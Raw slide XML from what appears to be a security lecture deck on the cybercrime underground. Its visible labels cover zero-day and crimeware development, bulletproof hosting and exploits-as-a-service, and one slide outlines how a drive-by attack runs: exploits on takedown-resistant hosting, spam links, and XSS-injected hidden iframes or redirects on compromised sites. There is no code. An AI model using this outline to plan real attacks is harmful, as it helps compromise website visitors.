            <a:ext cx="0" cy="43900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flipH="1">
            <a:off x="9973735" y="2126665"/>
            <a:ext cx="163768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B3DBC1-5D68-4327-9F7E-9CC4669056DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296714" y="6174230"/>
            <a:ext cx="0" cy="49253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FDAFA2-28DA-49EC-B885-3B2BE77B64AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505400" y="6668974"/>
            <a:ext cx="27913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DD76233-8748-48BA-A5C0-85B198F15820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1505400" y="4966385"/>
            <a:ext cx="0" cy="17085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4787FDB-0F75-4C11-ADD9-9A98A3C531E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3541057"/>
            <a:ext cx="0" cy="4927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3D054B5-2392-4175-9CD5-CDE7FF4C0A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3548530"/>
            <a:ext cx="5996989" cy="465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48BDDD5-F446-438D-9B52-AB2568ADA333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621701" y="3595111"/>
            <a:ext cx="0" cy="4386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D0F61A8-1D5D-447A-BBA7-869295DDE43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161466" y="3595110"/>
            <a:ext cx="0" cy="4386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D536A7E7-A6E2-4715-8939-342DAD5AB441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6556798" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle: Rounded Corners 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6739DC6-B36D-489A-BCFA-643DCAEE5EAB}"/>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3908339E-1583-46AF-A390-A94A28E28DB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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rPr>
                <a:t>Zero-day Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5FD889-3346-4CD8-A038-C5C40C956210}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9550956" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Rectangle: Rounded Corners 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08CBF0C-03A9-4452-A839-415F0248E337}"/>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B269B01C-5C1F-4067-AA5F-8E88FF7F55BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Crimeware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Straight Connector 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA76E5D-33F4-4A5A-B745-17A391F4D76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="53" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481636" y="1068185"/>
            <a:ext cx="0" cy="22949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1" name="Straight Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D31171E-46D8-4B36-8CDE-5EB642F4D13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10503171" y="1068185"/>
            <a:ext cx="0" cy="22949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2" name="Straight Connector 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B801004-FC82-43D0-BBB2-B7EA49575171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8925329" y="1297681"/>
            <a:ext cx="0" cy="30463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3" name="Straight Connector 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94C6349-1204-483B-BE52-BD95F8D8707B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7481637" y="1297681"/>
            <a:ext cx="3021534" cy="10176"/>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68" name="Rectangle 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C816762-5031-447A-8599-D58167172051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6302242" y="65705"/>
            <a:ext cx="5387824" cy="252418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9" name="Rectangle 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D6170F-46E2-4F33-B4E8-2772E243B7B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780613" y="2600063"/>
            <a:ext cx="2444684" cy="1205728"/>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0" name="Rectangle 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CFB7B45-CF4E-42D7-8C64-97367F31FFC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523766" y="3832589"/>
            <a:ext cx="11087651" cy="1205728"/>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1" name="Rectangle 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C3436D-11AC-4EA3-9372-B1D83D7E395D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505167" y="3738391"/>
            <a:ext cx="3283844" cy="2596693"/>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2" name="Rectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91FA6C24-2F6D-4B68-B100-3C33A9D28792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3699587" y="3730933"/>
            <a:ext cx="4561603" cy="1305804"/>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3" name="Rectangle 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{655499E2-FD8F-4DAD-9A04-43A62B13E0B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8300783" y="3741109"/>
            <a:ext cx="3231987" cy="1305804"/>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4" name="Rectangle 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A45A33C-4032-438E-A08F-03915987D7E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477634" y="5054371"/>
            <a:ext cx="7890290" cy="126137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5" name="Rectangle 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B2BB8-ECE5-462D-8694-D94DF8F97762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3479003" y="5063535"/>
            <a:ext cx="1812606" cy="126137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76" name="Group 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40894DD1-ECDF-483A-B62D-198E51C83BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3699587" y="1923564"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050411" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle: Rounded Corners 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E119D37-D620-41AC-B0E7-EB5491840D73}"/>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53F0EF3E-E5D5-47A7-B8F0-4AAB69871267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389102" y="1411965"/>
              <a:ext cx="1875636"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rPr>
                <a:t>Bulletproof Hosting</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Rectangle 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C37C8-85A3-4B6C-BCD7-9DAC539B7B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3412564" y="1700993"/>
            <a:ext cx="2271060" cy="1325562"/>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19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68"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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69"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="74"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="74"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="67" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" grpId="0" nodeType="after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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="76" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="77" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" grpId="0" nodeType="after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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7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5DC2F-DA71-459F-A960-99AFA756B0A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686834" y="1153572"/>
            <a:ext cx="3200400" cy="4461163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executing a Drive-by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948C929-25C6-4931-8E3B-C0F7A652E0C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4447308" y="591344"/>
            <a:ext cx="6906491" cy="5585619"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host the exploits on a bulletproof host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No need to distribute (expensive) exploit code to other websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resist law enforcement takedowns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim acquisition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam containing links (email, SMS, messenger)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromise legitimate websites and add booby-traps (e.g. via XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that load the exploit website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Force a redirect to the exploit website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2540934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024128" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Exploits-as-a-Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>For all your cloud-based exploitation needs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">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843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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA288E99-8C2D-4A88-999A-23A6D9C7AD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7414562" y="632347"/>
            <a:ext cx="3021534" cy="10176"/>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163747" y="162006"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structure of the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
